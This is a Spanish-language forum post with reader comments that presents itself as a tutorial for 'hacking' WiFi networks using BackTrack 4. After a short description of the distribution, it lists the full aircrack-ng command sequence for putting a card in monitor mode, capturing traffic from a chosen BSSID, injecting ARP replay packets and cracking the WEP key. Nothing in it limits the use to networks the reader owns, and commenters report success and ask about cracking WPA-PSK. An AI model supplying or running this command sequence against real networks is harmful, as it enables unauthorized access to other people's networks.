Hackea Redes WIFI con BackTrack 4

Buenas GNT como siempre aparezco poco aca, les dejo un tuto para Hack Red Wifi

La distribución por excelencia para la auditoria de seguridad ya tiene nueva versión, se trata de BackTrack 4 corrigiendo los errores y problemas que se fueron reportando en versiones anteriores, viene con el núcleo actualizado con la versión 2.6.30.9 más de 300 herramientas muchas de ellas no venían en versiones anteriores y un soporte mucho mayor para el hardware especialmente para las tarjetas inalámbricas
Los desarrolladores han dicho que esta era la mejor de las distribuciones con diferencia después de 18 meses de trabajo. Se puede instalar en el disco duro, aunque es una distribución que mucha gente tan solo la quiere en LiveCD ya que solo la usa en momentos puntuales como puede ser para la auditoría de redes inalámbricas, de hecho muchos únicamente conocen AirCrack-ng pero hay que decir que esta distribución tiene mucho más.

Seguir estos PASOS:

Mientras que los comandos utilizados, son estos:

Startx
/etc/init.d/networking start
airmon-ng
airmon-ng stop [wireless card name]
airmon-ng start [wireless card name]
airmon-ng
airodump-ng [wireless card name]
ctrl c
airodump-ng -w wep --channel [channel number] --bssid [Bssid number] [wireless card name]
aireplay-ng -1 0 -a [bssid] [wireless card name]
aireplay-ng -3 -b [bssid][wireless card name]
ctrl + c
dir
aircrack-ng [filename].cap

(Este utilize yo xq tenias "algunos conocimientos")

PD: Cualquier DUDA MP
PD: Perdon que no ponga el link en MF, espero comentarios constructivo por que es un archivo de mas de 1GB
Hackea Redes WIFI con BackTrack 4
5 Puntos Score: 5/10
Visitas: 4252 Favoritos: 6
Ver los usuarios que votaron...
11 Comentarios Hackea Redes WIFI con BackTrack 4
jajaj es un buen programa para hack pero es muy pobre tu tuotial
Cita Sebxxxs: Mostrar
espero que te guste tenias razon del tuto ahi te deje unos videos !!
gracias x tu comentario
este programa no da?
bueno yo e probado el air-crack solo en Linux pero en windows fue una completa porqueria, solo para curiosiar me lo bajare haber que tal si funciona bien lo recomendare a muchos de mis amigos.
Cita Vincent_VII: Mostrar
Cita Mway: Mostrar
Bucha el enlace me lleva al backltrack 5.... Alguien me ayuda??? Necesito el back track 4r2 :c
@Anubis32 el backtrack ya se actualizo yo tngo el 4, le hago una imagen y te lo subo cuando puedo !!!
emm no se etiquetar xD pero, Mway, gracias, pero ya consegui el 4... Experimente con Aircrack y tuve bastante exito Pero aun no tengo claro el tema de los diccionarios para decifrar claves WAP-PSK...
Creo que es perdida de tiempo por que las nuevas encriptaciones que son WAP y WAP2 son mas conplicadas de desifrar si estoy equibocado corrijanme per solo doy mi opinion  
oye amigo no tendras el backtrack 4 es que lo ee buscado por muchos lados y no lo hallo y es la version que se manejar mas andale echame la mano  
Para dejar un comentario Registrate! o.. eres ya usuario? Accede!